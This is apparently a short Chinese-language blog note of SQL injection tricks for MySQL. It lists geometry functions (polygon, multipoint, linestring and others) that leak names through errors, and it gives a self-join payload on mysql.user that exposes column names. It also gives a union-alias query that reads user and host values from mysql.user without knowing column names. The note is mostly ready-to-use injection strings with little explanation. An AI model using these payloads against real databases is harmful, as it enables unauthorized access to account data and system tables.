利用已知列名爆 库名 和 表名

1

可以发现必须要列名正确,类似的一共有:
polygon、multipoint、multilinestring、multipolygon、linestring

用已知库名爆列名

2

原理嘛。。。不是很清楚

语句:
and (select * from (select * from mysql.user a join mysql.user b using(Host,User))c);

绕过列名爆数据

select table_schema,table_name from information_schema.tables where table_name='session' union select 1,(select h.2 from (select 1,2 union select user,host from mysql.user limit 1 offset 3 )h);

这里的关键应该在:

select h.2 from (select 1,2 union select user,host from mysql.user limit 1 offset 3 )h

1

可以发先列名变成了我们构造的,应该是因为 union 会使用 第一个 select 的语句作为列名。